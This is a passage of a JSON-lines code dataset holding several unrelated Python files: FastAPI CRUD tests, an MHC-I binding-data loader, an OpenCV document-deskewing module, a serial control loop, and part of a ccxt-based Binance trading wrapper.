i['name'] == 'testPatchtestPatchtestPatch']\n resp = client.patch(\n f\"/products/edit/{target_ids[0]}\", json={\"idPhoto\": 1234})\n end = client.get(\"/products/all\").json()\n assert [i['idPhoto'] for i in end if i['id'] == target_ids[0]][0] == 1234\n for t in target_ids:\n 
client.delete(f\"/products/delete/{t}\")\n\n\ndef test_invalid_patch():\n '''create, patch, delete'''\n client.post(\"/products/create\",\n json={'name': 'testPatchtestPatchtestPatch'})\n start = client.get(\"/products/all\").json()\n target_ids = [i['id']\n for i in start if i['name'] == 'testPatchtestPatchtestPatch']\n resp = client.patch(\n f\"/products/edit/{target_ids[0]}\", json={\"id_____Photo\": 1234})\n print(resp, resp.text)\n end = client.get(\"/products/all\").json()\n for t in target_ids:\n client.delete(f\"/products/delete/{t}\")\n","repo_name":"ressiwage/TESTTASK-fastapi-crud","sub_path":"server/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14202398215","text":"from .libio import MIO\nimport csv \n\nclass MHCIDBData(MIO):\n \"\"\" existing data path and file names \n \"\"\"\n def __init__(self, args):\n self.args = args\n self.UPDATE = args.UPDATE\n self.data_dir = args.data_dir\n self.mhcI_db_dir = \"MHCIDB\"\n self.setMHCIDBPath(mhcidb_dirname=self.mhcI_db_dir, data_dir=self.data_dir)\n \n \n def __setMHCI_DB_Path(self, mhcidb_dirname):\n \"\"\" set MHCI Database directory path \"\"\"\n if not hasattr(self, \"mhcIdb_path\") or self.mhcIdb_path is None:\n cwd = self.getCWD() \n pre_dir, after = cwd.split(mhcidb_dirname)\n self.mhcIdb_path = self.joinPath(pre_dir,mhcidb_dirname )\n print((\"# MHCIDB workding path: {}\".format(self.mhcIdb_path)))\n \n \n def setMHCIDBPath(self, mhcidb_dirname=\"MHCIDB\", data_dir=\"existing_data\"):\n \"\"\" set MHCIDB working directory path and there existing data \"\"\"\n self.__setMHCI_DB_Path(mhcidb_dirname)\n self.mhcIdb_existing_data_path = self.joinPath(self.mhcIdb_path, data_dir)\n self.mhcIdb_hla_path = self.joinPath(self.mhcIdb_existing_data_path, \"hla\" )\n self.mhcIdb_pdb_path = self.joinPath(self.mhcIdb_existing_data_path, \"pdb\" )\n self.mhcIdb_ba_path = self.joinPath(self.mhcIdb_existing_data_path, \"ba\" ) \n self.mhcIdb_pdb3d_path = self.joinPath(self.mhcIdb_pdb_path, \"raw_pdbs\")\n \n \n def get_hla_aligned_seq_fp(self):\n \"\"\" return the path of the file contains the alinged protein seqeuences of \n HLA gene A, B and C\n \"\"\"\n fn_aln = \"ClassI_prot.txt\"\n return self.joinPath(self.mhcIdb_hla_path, fn_aln) \n \n def getAnchorMajorSeqFp(self):\n fn = \"HLA_amseq.bin\"\n return self.joinPath(self.mhcIdb_hla_path, fn)\n \n \n def getHLAAlleleGrpFp(self):\n fn = \"hla_allele_grps.bin\"\n return self.joinPath(self.mhcIdb_hla_path, fn)\n \n \n def getDLFastaFp(self, fn=\"fasta.txt\"):\n return self.joinPath(self.mhcIdb_pdb_path, fn)\n \n \n def pdbid2Fp(self, pdbid):\n return self.joinPath(self.mhcIdb_pdb3d_path, \"{}.pdb\".format(pdbid.lower()))\n \n \n def getSeqFilteredFpBin(self):\n fn_out_pre = \"mhcI_filter_by_seq\" \n fn_out_pre = self.joinPath(self.mhcIdb_pdb_path,fn_out_pre)\n fp_out_bin = \"%s.bin\" % fn_out_pre\n return fp_out_bin\n \n def getMHCIPDBFpBin(self):\n \"\"\" return existing pdbids' filename and path \"\"\"\n fn = \"mhcI_pdbs.bin\"\n return self.joinPath(self.mhcIdb_pdb_path, fn)\n \n def getPDB2ALLeleFpBin(self):\n fn = \"mhcI_pdb_to_allele.bin\"\n return self.joinPath(self.mhcIdb_path, fn)\n \n def getIEDBFp(self):\n fn_bind_data = 'bdata.20130222.mhci.txt'\n return self.joinPath(self.mhcIdb_ba_path, fn_bind_data)\n \n def getBindDataFp(self):\n fn_bind_bin = \"mhcI_bdata.bin\"\n return self.joinPath(self.mhcIdb_ba_path, fn_bind_bin)\n \n def 
loadMHCIBindData(self):\n fp_bind_data = self.getBindDataFp()\n if not self.isNew(fp_bind_data):\n self.mhcI_bind_data = self.loadObj(fp_bind_data)\n else:\n self.readBindData(self.getIEDBFp())\n self.dumpObj(self.mhcI_bind_data, fp_bind_data)\n \n \n def readBindData(self, fp):\n txt = self.readTxtFile(fp)\n self.mhcI_bind_data = {}\n cnt = 0\n for ln in txt[1:]:\n ln = ln.strip()\n elems = ln.split()\n if not ln: continue\n if len(elems) != 6:\n print(\"# Error in parsing: %s\" % ln) \n else:\n allele_name = elems[1]\n if allele_name.startswith(\"HLA-\"):\n cnt += 1\n lig_len = elems[2]\n lig = elems[3]\n inq = elems[4]\n bd = elems[5]\n if allele_name in self.mhcI_bind_data:\n self.mhcI_bind_data[allele_name].append((lig_len, lig, inq, bd))\n else:\n self.mhcI_bind_data[allele_name]= [(lig_len, lig, inq, bd)]\n ln = \"# num HLA binding data: %s\" % cnt\n self.add2log(ln, vb=1) \n \n \n def loadMHCIPDB2AlleleData(self):\n fp_bin = self.getPDB2ALLeleFpBin()\n self.matched_pdbs, self.non_matched_pdbs = self.loadObj(fp_bin)\n \n \n\n def loadMHCIPDBInf(self):\n \"\"\" mhci_pdbs[pdbid] = [(chain_ids, chain_seq(xxx,...), [ligand chains]), ...] \"\"\"\n fp = self.getMHCIPDBFpBin()\n self.mhcI_pdbs = self.loadObj(fp)\n self.mhcI_pdbids = self.mhcI_pdbs.keys() \n \n def getMHCILigandFpBin(self):\n fn = \"mhcI_pdb_ligand.bin\"\n fp = self.joinPath(self.mhcIdb_pdb_path, fn)\n return fp \n \n \n def saveMPBDB2CSV(self, mpbdb, fn=\"mpbdb.csv\"):\n \"\"\" lig_seq, lig_chain_id, lig_len \"\"\"\n with open(fn, 'w') as fh:\n writer = csv.writer(fh)\n pdbids = list(mpbdb.keys())\n pdbids.sort()\n heads = [\"PDBID\", \"Allele\", \"Ligand_len\", \"Ligand_seq\", \"Binding_operator\", \"Binding_affinity\"]\n writer.writerow(heads)\n for pdbid in pdbids:\n pdb_bds, cnt = mpbdb[pdbid]\n allele_name = pdb_bds[0][0]\n if cnt == 0:\n bd_opt, ba = \"\", \"\"\n lig_seq, lig_chain_id, lig_len = self.getLigandSeq(pdbid)\n if lig_seq is None:\n lig_seq = ''\n lig_len = ''\n else:\n lig_len = len(lig_seq) \n elif cnt > 1:\n print(\"#Error: muliple binding affinities for pdb: {} -> {}\".format(pdbid, pdb_bds))\n else:\n #print(pdb_bds[0][1])\n lig_len, lig_seq, bd_opt, ba = pdb_bds[0][1][0]\n row = [pdbid, allele_name, lig_len, lig_seq, bd_opt, ba] \n writer.writerow(row)\n print(\"# Saving Mpdbdb into: {}\".format(fn))\n \n \n def loadMHCIPDBLigandSeq(self):\n fp_bin = self.getMHCILigandFpBin()\n if self.isNew(fp_bin):\n fp_fasta = self.getDLFastaFp()\n self.readPdbSeqs(fp_fasta)\n #print( self.pdb_seqs)\n self.mhcI_pdb_ligands_seqs = {}\n for pdbid in self.mhcI_pdbids:\n ligand_inf = self.mhcI_pdbs[pdbid][-1]\n if ligand_inf:\n ligand_chain_id = ligand_inf[0][0]\n ligand_length = ligand_inf[0][1]\n self.mhcI_pdb_ligands_seqs[pdbid] = self.pdb_seqs[pdbid][ligand_chain_id], ligand_chain_id, ligand_length\n self.dumpObj(self.mhcI_pdb_ligands_seqs, fp_bin, vb=1)\n else:\n self.mhcI_pdb_ligands_seqs = self.loadObj(fp_bin) \n \n ","repo_name":"jinbuw/mpbdb","sub_path":"src/lib/libmhcidb.py","file_name":"libmhcidb.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26782793768","text":"# pylint: disable=missing-docstring, protected-access\n\nimport os\nimport unittest\nimport tempfile\nimport warnings\n\nimport iCount\n\n\nclass TestExamplesScriptsInstall(unittest.TestCase):\n\n def setUp(self):\n self.tempdir = tempfile.mkdtemp()\n self.examples_dir = os.path.join(self.tempdir, 'examples')\n 
warnings.simplefilter(\"ignore\", ResourceWarning)\n\n def test_examples(self):\n iCount.examples.run(out_dir=self.tempdir)\n # check if two scripts are present in subfolder examples\n self.assertTrue(\n os.path.isfile(os.path.join(self.examples_dir, 'hnRNPC.sh'))\n )\n self.assertTrue(\n os.path.isfile(os.path.join(self.examples_dir, 'hnRNPC_reduced.sh'))\n )\n\n def tearDown(self):\n files = os.listdir(self.examples_dir)\n for fn in files:\n os.remove(os.path.join(self.examples_dir, fn))\n\n os.rmdir(self.examples_dir)\n os.rmdir(self.tempdir)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"tomazc/iCount","sub_path":"iCount/tests/test_examples.py","file_name":"test_examples.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"94"} +{"seq_id":"32278533839","text":"#!/anaconda3/bin/python3.7\n# -*- coding: UTF-8 -*-\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\ndef get_results_by_folds(nbr_folds, df):\n list_finale_metrics_dev = list()\n list_text_added = list()\n list_all_metrics_test = list()\n for fold in range(nbr_folds):\n df_fold = df.loc[df['fold'] == fold]\n list_finale_metrics_dev.append(np.array(df_fold.iloc[-1:,-2:].values.tolist()[0]))\n list_all_metrics_test.append(df_fold.iloc[:,-2:].values.tolist())\n return np.array(list_finale_metrics_dev), np.array(list_text_added), np.array(list_all_metrics_test)\n\ndef get_finale_results(nbr_folds, df):\n metrics, text_added, all_metrics_test = get_results_by_folds(nbr_folds, df)\n evolution_text_added = np.sum(text_added, axis=0)/nbr_folds\n evolution_metrics_test = np.sum(all_metrics_test, axis=0)/nbr_folds\n finale_metrics_dev = np.sum(metrics, axis=0)/nbr_folds\n\n mse_evolution = evolution_metrics_test[:,0]\n mae_evolution = evolution_metrics_test[:,1]\n accuracy = evolution_metrics_test[:,2]\n mse_finale = finale_metrics_dev[0]\n mae_finale = finale_metrics_dev[1]\n\n return evolution_text_added, mse_evolution, mae_evolution, mse_finale, mae_finale, accuracy\n\nif __name__ == \"__main__\":\n\n df = pd.read_csv(\"../projetAA/semi_supervised_multilabels-expertFeatures_epoch-30_seuil-0-6_iter-8.csv\", sep=\"\\t\", index_col=0)\n\n evolution_text_added, mse_evolution, mae_evolution, mse_finale, mae_finale, accuracy = get_finale_results(5, df)\n\n title = \"Variation des performances durant les itérations\"\n fig = plt.figure()\n plt.title(title)\n x = [el for el in range(len(mae_evolution))]\n plt.xlabel(\"itérations\")\n plt.ylabel(\"mesure\")\n\n plt.plot(x, mse_evolution, color=\"green\", label='MSE')\n plt.plot(x, mae_evolution, color=\"orange\", label='MAE')\n plt.plot(x, accuracy, color=\"blue\", label='Accuracy')\n\n plt.legend(loc='upper left')\n plt.savefig('../{}.png'.format(title.replace(\"\\n\", \"\").replace(\" : \",\"_\").replace(\" \", \"_\").replace(\",\", \"-\").strip()), dpi=300, format='png', bbox_inches='tight')","repo_name":"xingyuliuNLP/tweet_register","sub_path":"5_performance_evolution.py","file_name":"5_performance_evolution.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72246056630","text":"import time\nimport serial\n \nser = serial.Serial( \n port='/dev/serial0',\n baudrate = 115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\nwhile True:\n x = input()\n 
ser.write(x.encode())","repo_name":"jstkyle/Senior-Design","sub_path":"Raspi_Software/kb_control.py","file_name":"kb_control.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"4309081169","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import List\nfrom sys import intern\nimport cv2\nimport numpy as np\nimport math\nfrom typing import List, Tuple\nfrom imageutil import *\n\nIMG_FILE = 'contract_house.png'\nMAX_PIXEL = 3508\nMAX_WIDTH = 2480\nMAX_HEIGHT = MAX_PIXEL\n\ndef convertColor(img):\n tmp = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n tmp = cv2.threshold(tmp, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n return tmp\n\ndef resizeImage(img):\n height, width = img.shape\n # print(\"height: {}, width : {}\".format(height, width))\n sampling_method = cv2.INTER_LINEAR\n if height * width > MAX_WIDTH * MAX_HEIGHT :\n # This image needs downsampling\n sampling_method = cv2.INTER_LENEAR\n else :\n sampling_method = cv2.INTER_AREA\n \n if width > height :\n newheight = int(height * MAX_WIDTH / width)\n # print(\"new h : {}, w : {}\".format(newheight, MAX_WIDTH))\n tmp = cv2.resize(img, (MAX_WIDTH, newheight), interpolation=sampling_method)\n else :\n newwidth = int(width * MAX_HEIGHT / height)\n # print(\"new h : {}, w : {}\".format(newwidth, MAX_HEIGHT))\n tmp = cv2.resize(img, (newwidth, MAX_HEIGHT), interpolation=sampling_method)\n return tmp\n\ndef filteredAngle(angles):\n npangles = np.array(angles)\n mean = np.mean(npangles)\n std = np.std(npangles)\n dfm = abs(npangles-mean)\n max_deviation = 2\n not_outliers = dfm < max_deviation * std\n std_angles = npangles[not_outliers]\n if(len(std_angles) > 0):\n return np.median(std_angles)\n else:\n return 0\n\ndef getSkewnessFromVlines(img, vlines):\n angles = []\n # print('vlines:{}'.format(vlines))\n for line in vlines:\n for x1,y1,x2,y2 in line:\n if abs(y2-y1) == 0:\n angles.append(0)\n continue\n if abs(x2-x1) == 0:\n angles.append(0)\n continue\n yd = y1 - y2\n xd = x2 - x1\n if xd == 0:\n continue\n angle = math.degrees(math.atan(yd/xd))\n angle = 90 - angle\n # print(angle)\n if abs(angle) > 4:\n continue\n angles.append(angle)\n # print('v angles:{}'.format(angles))\n return filteredAngle(angles)\n\ndef getSkewnessFromLines(img, lines):\n angles = []\n threshold_pixel = 12\n h_milestonpoints = []\n hlines = {}\n for line in lines:\n for x1,y1,x2,y2 in line:\n if abs(y2-y1) == 0 :\n angles.append(0)\n continue\n if abs(x2-x1) == 0 :\n angles.append(0)\n continue\n yd = y2-y1\n xd = x2-x1\n angle = math.atan(yd/xd)*180/math.pi\n if angle > 4 :\n continue\n if angle < -4 :\n continue\n angles.append(angle)\n if (abs(h_milestonpoints - y1) < threshold_pixel).sum() == 0:\n h_milestonpoints.append(y1)\n newlist = []\n newlist.append((x1,y1,x2,y2))\n hlines[y1] = newlist\n else:\n idx = [i for i,v in enumerate(abs(h_milestonpoints - y1) < threshold_pixel) if v > 0][0]\n targetlist = hlines[h_milestonpoints[idx]]\n targetlist.append((x1,y1,x2,y2))\n\n # print('angles:{}'.format(angles))\n\n ## Calculate median value from the longest hline\n anglesfromlline = []\n # print('horizontal lines for skewness detecting: {}'.format(hlines))\n for linepaths in hlines.values():\n linepaths.sort(key=lambda line:line[0])\n x1 = linepaths[0][0] # x1\n y1 = linepaths[0][1]\n linepaths.sort(key=lambda line:line[2])\n x2 = linepaths[-1][2]\n y2 = linepaths[-1][3]\n yd = y2-y1\n xd = x2-x1\n angle = 
math.atan(yd/xd)*180/math.pi\n anglesfromlline.append(angle)\n # print(anglesfromlline)\n\n ## Calculate via HoughLine\n sorted(h_milestonpoints)\n h_milestonpoints = np.sort(h_milestonpoints)\n heights = np.diff(h_milestonpoints)\n angleFromHoughLine = None\n if(len(heights)>0):\n average_span_height = np.median(heights)\n # print('avg height:{}'.format(average_span_height))\n threshold = 10\n std_line_index = int(np.argmin(abs(heights - average_span_height) < threshold, axis=0))\n std_line_ypoint = h_milestonpoints[std_line_index]\n largest_element = hlines[std_line_ypoint]\n \n # print('largest elements:{}'.format(largest_element))\n x_values = np.array([])\n x_values = np.append(x_values,sorted(set([item[0] for item in largest_element])))\n x_values = np.append(x_values,sorted(set([item[2] for item in largest_element])))\n y_values = np.array([])\n y_values = np.append(y_values,sorted(set([item[1] for item in largest_element])))\n y_values = np.append(y_values,sorted(set([item[3] for item in largest_element])))\n sorted(x_values)\n sorted(y_values)\n # print(x_values)\n # print(y_values)\n x1 = int(x_values[0])\n x2 = int(x_values[-1])\n y1 = int(y_values[0])\n y2 = int(y_values[-1])\n if x1 > x2 :\n x1,x2 = x2,x1\n if y1 > y2 :\n y1,y2 = y2,y1\n # print('largest elements ROI: {},{},{},{}'.format(x1,x2,y1,y2)) \n roi = img[y1:y2, x1:x2]\n debugShow('lineroi', roi)\n\n anglefromhline = []\n houghlines = cv2.HoughLines(roi,1,np.pi/180 / 10,int(abs(x2-x1)*9/10))\n if houghlines is not None :\n for oneline in houghlines:\n rho, theta = oneline[0]\n degree = math.degrees(theta)\n # print('rho, theta, skewness: {}, {}'.format(rho, degree, 90-degree))\n angleFromHoughLine = (90-degree) * -1\n anglefromhline.append(angleFromHoughLine)\n angleFromHoughLine = filteredAngle(anglefromhline)\n\n angleFromShortPaths = filteredAngle(angles)\n angleFromLongestPaths = filteredAngle(anglesfromlline)\n if angleFromHoughLine is None:\n angleFromHoughLine = 0.0\n\n # print('s.angle, l.angle, h.angle: {}, {}, {}'.format(angleFromShortPaths, angleFromLongestPaths, angleFromHoughLine))\n\n if abs(angleFromLongestPaths) > abs(angleFromShortPaths):\n if abs(angleFromHoughLine) < abs(angleFromLongestPaths):\n return angleFromHoughLine\n else:\n return angleFromLongestPaths\n else:\n return angleFromShortPaths\n\ndef get_median_angle(binary_image):\n # applying morphological transformations on the binarised image\n # to eliminate maximum noise and obtain text ares only\n # boxes = getLineDetection(binary_image)\n erode_otsu = cv2.erode(binary_image,np.ones((7,7),np.uint8),iterations=1)\n negated_erode = ~erode_otsu\n debugShow('erode_otsu', negated_erode)\n opening = cv2.morphologyEx(negated_erode,cv2.MORPH_OPEN,np.ones((5,5),np.uint8),iterations=2)\n debugShow('opening', opening)\n double_opening = cv2.morphologyEx(opening,cv2.MORPH_OPEN,np.ones((3,3),np.uint8),iterations=5)\n debugShow('double_opening', double_opening)\n double_opening_dilated_3x3 = cv2.dilate(double_opening,np.ones((3,3),np.uint8),iterations=4)\n debugShow('dilated_3x3', double_opening_dilated_3x3)\n # finding the contours in the morphologically transformed image\n contours_otsu,_ = cv2.findContours(double_opening_dilated_3x3,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n # debugShowContours('contours', double_opening_dilated_3x3, contours_otsu)\n # iniatialising the empty angles list to collet the angles of each contour\n angles = []\n\n # obtaining the angles of each contour using a for loop\n for cnt in range(len(contours_otsu)):\n # the last 
output of the cv2.minAreaRect() is the orientation of the contour\n rect = cv2.minAreaRect(contours_otsu[cnt])\n\n # appending the angle to the angles-list\n angles.append(rect[-1])\n \n # finding the median of the collected angles\n angles.sort()\n median_angle = np.median(angles)\n\n # returning the median angle\n return median_angle\n\n# funtion to correct the median-angle to give it to the cv2.warpaffine() function\ndef corrected_angle(angle):\n if 0 <= angle <= 90:\n corrected_angle = angle - 90\n elif -45 <= angle < 0:\n corrected_angle = angle - 90\n elif -90 <= angle < -45:\n corrected_angle = 90 + angle\n return corrected_angle\n\ndef rotate(img, angle):\n (h, w) = img.shape[:2]\n center = (w // 2, h // 2)\n # print('center and radian:{}, {}', center, math.radians(angle))\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n return rotated\n\n# https://github.com/TarunChakitha/OCR/blob/master/OCR.py\n# https://stackoverflow.com/questions/45322630/how-to-detect-lines-in-opencv\ndef getLines(img, low_threshold, min_line_length, line_gap, granulity):\n rho = 1 # distance resolution in pixels of the Hough grid\n theta = np.pi / 180 / granulity # angular resolution in radians of the Hough grid\n lines = cv2.HoughLinesP(img, rho, theta, low_threshold, np.array([]), min_line_length, line_gap)\n return lines\n\ndef filterHVLines(lines, standard_degree):\n hlines = []\n for line in lines:\n for x1, y1, x2, y2 in line:\n degree = math.degrees(math.atan2(y1-y2, x2-x1))\n degree = degree - standard_degree\n if abs(degree) < 5:\n hlines.append(line)\n return hlines\n\ndef getHLines(img, low_threshold, min_line_length, line_gap, granulity):\n lines = getLines(img, low_threshold, min_line_length, line_gap, granulity)\n return filterHVLines(lines, 0)\n\ndef getVLines(img, low_threshold, min_line_length, line_gap, granulity):\n lines = getLines(img, low_threshold, min_line_length, line_gap, granulity)\n return filterHVLines(lines, 90)\n\ndef getAverageAngles(standard_degree, lines):\n filtered = []\n filteredlines = []\n for line in lines:\n for x1,y1,x2,y2 in line:\n degree = math.degrees(math.atan2(y1-y2, x2-x1))\n degree = degree - standard_degree\n if abs(degree) < 5:\n filtered.append(degree)\n filteredlines.append(line)\n return filteredAngle(filtered), filteredlines\n\ndef drawLines(img, lines):\n imgcopy = np.copy(img) * 0\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(imgcopy,(x1,y1),(x2,y2),(255,255,255),2)\n # debugShow('drawlines', imgcopy)\n return imgcopy\n\ndef deskew(img):\n debug = False\n low_threshold = 30\n line_length_unit = int(img.shape[1] / 10)\n angle = 0\n filteredlines = []\n for multiple in reversed(range(9)):\n min_line_length = multiple * line_length_unit\n line_gap = 10\n hlines = getHLines(img, low_threshold, min_line_length,line_gap, 5)\n # print('max line, # of lines:{},{}'.format(min_line_length, len(hlines)))\n if len(hlines) > 3:\n hlines = getHLines(img, low_threshold, min_line_length, line_gap, 10)\n angle, filteredlines = getAverageAngles(0, hlines)\n if len(filteredlines) > 3:\n break\n # print(angle)\n debugShow('lines', drawLines(img, filteredlines), debug)\n angle = angle * -1\n rotatedimg = rotate(img, angle)\n return rotatedimg, angle\n\ndef deskewFromVline(img):\n low_threshold = 30\n line_length_unit = int(img.shape[0] / 10)\n angle = 0\n filteredlines = []\n for multiple in reversed(range(9)):\n min_line_length = multiple * line_length_unit\n 
line_gap = 10\n vlines = getVLines(img, low_threshold, min_line_length,line_gap, 5)\n # print('max line, # of lines:{},{}'.format(min_line_length, len(vlines)))\n if len(vlines) > 3:\n vlines = getVLines(img, low_threshold, min_line_length, line_gap, 10)\n angle, filteredlines = getAverageAngles(90, vlines)\n if len(filteredlines) > 3:\n break\n # print(angle)\n debugShow('lines', drawLines(img, filteredlines))\n angle = angle * -1\n rotatedimg = rotate(img, angle)\n return rotatedimg\n\ndef rotatePoint(point, center, angrad:float):\n point = (point[0] - center[0], point[1] - center[1])\n x = math.cos(angrad) * point[0] - math.sin(angrad) * point[1]\n y = math.sin(angrad) * point[0] + math.cos(angrad) * point[1]\n point = (int(x + center[0]), int(y + center[1]))\n return point\n\ndef recoverOriginalPoint(orgsize, resized, skewnessRad: float, topleft, bottomright) -> List[tuple(int, int)]:\n resizedratio = orgsize[0] / resized[0]\n resizedx1 = topleft[0] * resizedratio\n resizedx2 = bottomright[0] * resizedratio\n resizedy1 = topleft[1] * resizedratio\n resizedy2 = bottomright[1] * resizedratio\n center = (orgsize[0] // 2, orgsize[1] // 2)\n point1 = (resizedx1, resizedy1)\n point2 = (resizedx1, resizedy2)\n point3 = (resizedx2, resizedy2)\n point4 = (resizedx2, resizedy1)\n reverseang = skewnessRad\n orgpoint1 = rotatePoint(point1, center, reverseang)\n orgpoint2 = rotatePoint(point2, center, reverseang)\n orgpoint3 = rotatePoint(point3, center, reverseang)\n orgpoint4 = rotatePoint(point4, center, reverseang)\n rtn = [orgpoint1, orgpoint2, orgpoint3, orgpoint4]\n return rtn\n\nif __name__ == '__main__':\n\n img = cv2.imread(IMG_FILE)\n\n # 0. Converting color to grey & binarization\n thresh_inv = convertColor(img)\n # 1. Resizing - Upsampling or Downsampling\n resized = resizeImage(thresh_inv)\n # debugShow('resizeImage', resized)\n # 2. 
deskew\n deskewed = deskew(resized)\n debugShow('deskewed', deskewed)\n deskewed = deskewFromVline(deskewed)\n debugShow('deskewed', deskewed)\n","repo_name":"kpyopark/pytesseract_tableform_text","sub_path":"deskew.py","file_name":"deskew.py","file_ext":"py","file_size_in_byte":13719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"8264500286","text":"closing = [']', '}', ')']\nbracket_dict = {'[': ']', '{': '}', '(': ')'}\nfrom Stack import stack\n\n\ndef check_balance(string):\n string = list(string)\n br_stack = stack.Stack()\n for bracket in string:\n if bracket in closing:\n if br_stack.size() == 0 or bracket_dict[br_stack.pop()] != bracket:\n return 'Несбалансированно'\n else:\n br_stack.push(bracket)\n if br_stack.size() != 0:\n return 'Несбалансированно'\n return 'Cбалансированно'\n\n\nprint(check_balance('[]{({})}'))\n","repo_name":"krushmuk/stack","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72837407029","text":"from .pexchange import ccxt, ccxt_async, httpx\nfrom model import MarketOrder\n\n\nclass Binance:\n def __init__(self, key, secret):\n self.future = ccxt.binance({\n 'apiKey': key,\n 'secret': secret,\n 'enableRateLimit': True,\n 'options': {\n 'defaultType': 'future'\n }\n })\n self.future_async = ccxt_async.binance({\n 'apiKey': key,\n 'secret': secret,\n 'options': {\n 'defaultType': 'future'\n }\n })\n self.spot = ccxt.binance({\n 'apiKey': key,\n 'secret': secret,\n })\n self.spot_async = ccxt_async.binance({\n 'apiKey': key,\n 'secret': secret,\n })\n self.spot.load_markets()\n self.future.load_markets()\n self.order_info: MarketOrder = None\n\n def parse_quote(self, quote: str):\n if self.order_info is None:\n return quote.replace(\"PERP\", \"\")\n else:\n if self.order_info.is_futures:\n return quote.replace(\"PERP\", \"\")\n else:\n return quote\n\n def parse_symbol(self, base: str, quote: str):\n quote = self.parse_quote(quote)\n if self.order_info is None:\n return f\"{base}{quote}\"\n else:\n if self.order_info.is_futures:\n return f\"{base}/{quote}\"\n else:\n return f\"{base}/{quote}\"\n\n def parse_side(self, side: str):\n if side.startswith(\"entry/\") or side.startswith(\"close/\"):\n return side.split(\"/\")[-1]\n else:\n return side\n\n def get_amount(self, base, quote, amount, percent) -> float:\n if amount is not None and percent is not None:\n raise Exception(\"amount와 percent는 동시에 사용할 수 없습니다\")\n elif amount is not None:\n result = amount\n elif percent is not None:\n if self.order_info.side in (\"buy\", \"entry/buy\", \"entry/sell\"):\n cash = self.get_balance(quote) * percent/100\n current_price = self.fetch_price(base, quote)\n result = cash / current_price\n elif self.order_info.side in (\"sell\", \"close/buy\", \"close/sell\"):\n symbol = self.parse_symbol(base, quote)\n free_amount = self.get_futures_position(symbol) if self.order_info.is_crypto and self.order_info.is_futures else self.get_balance(base)\n result = free_amount * float(percent)/100\n else:\n raise Exception(\"amount와 percent 중 하나는 입력해야 합니다\")\n return result\n\n def market_order(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n return self.spot.create_order(symbol, type.lower(), side.lower(), amount)\n\n async def market_order_async(self, base: str, quote: 
str, type: str, side: str, amount: float, price: float = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n return await self.spot_async.create_order(symbol, type.lower(), side.lower(), amount)\n\n def market_buy(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None, buy_percent: float = None):\n buy_amount = self.get_amount(base, quote, amount, buy_percent)\n return self.market_order(base, quote, type, side, buy_amount)\n\n async def market_buy_async(self, base: str, quote: str, type: str, side: str, amount: float, price: float = None, buy_percent: float = None):\n buy_amount = self.get_amount(base, quote, amount, buy_percent)\n return await self.market_order_async(base, quote, type, side, buy_amount)\n\n def market_sell(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, sell_percent: float = None):\n sell_amount = self.get_amount(base, quote, amount, sell_percent)\n return self.market_order(base, quote, type, side, sell_amount)\n\n async def market_sell_async(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, sell_percent: float = None):\n sell_amount = self.get_amount(base, quote, amount, sell_percent)\n return await self.market_order_async(base, quote, type, side, sell_amount)\n\n def is_hedge_mode(self):\n response = self.future.fapiPrivate_get_positionside_dual()\n if response['dualSidePosition']:\n return True\n else:\n return False \n\n def market_entry(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, entry_percent: float = None, leverage: int = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n entry_amount = self.get_amount(base, quote, amount, entry_percent)\n if leverage is not None:\n self.set_leverage(leverage, symbol)\n try:\n return self.future.create_order(symbol, type.lower(), side, abs(entry_amount))\n except Exception as e:\n if \"position side does not match\" in str(e):\n if side == \"buy\":\n positionSide = \"LONG\"\n elif side == \"sell\":\n positionSide = \"SHORT\"\n return self.future.create_order(symbol, type.lower(), side, abs(entry_amount), params={'positionSide': positionSide})\n else:\n raise Exception(\"진입 실패\")\n\n \n\n def market_long_entry(self, base: str, quote: str, amount: float, price:str =None, entry_percent: float = None, leverage: int = None):\n return self.market_entry(base, quote, \"market\", \"entry/buy\", amount, price, entry_percent, leverage)\n \n def market_short_entry(self, base: str, quote: str, amount: float, price:str =None, entry_percent: float = None, leverage: int = None):\n return self.market_entry(base, quote, \"market\", \"entry/sell\", amount, price, entry_percent, leverage)\n\n # def market_stop_order(self, base: str, quote: str, type: str, side: str, amount: float, price: float, stop_price: float):\n # symbol = f\"{base}/{quote}\"\n # return self.future.create_stop_market_order(symbol, type.lower(), side.lower(), amount, price, {\"stopPrice\": stop_price})\n\n def market_sltp_order(self, 